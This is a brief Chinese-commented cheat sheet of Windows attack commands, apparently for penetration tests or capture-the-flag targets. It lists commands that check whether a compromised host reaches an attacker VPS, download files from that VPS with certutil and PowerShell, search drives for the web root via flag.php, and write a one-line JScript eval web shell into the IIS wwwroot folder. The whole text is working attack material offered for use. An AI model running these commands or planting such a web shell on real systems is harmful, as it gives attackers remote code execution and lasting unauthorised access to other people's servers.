#探测目标是否出网
powershell Invoke-WebRequest -Uri http://vps/

#文件下载
certutil.exe -urlcache -split -f http://vps/a.txt D:\a.txt
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://vps/a.txt', 'D:\a.txt')"

#命令执行查找web目录
dir /s/a-d/b D:\*flag.php
where /r D:\ flag.php
for /r D:\ %i in (*flag.php) do @echo %i
for /r D:\ %i in (*flag.php) do @echo %i>%i.txt

#写shell
echo ^<%@ Page Language="Jscript"%^> ^<% eval(Request.Item["ant"],"unsafe"); %^>> C:\inetpub\wwwroot\a.aspx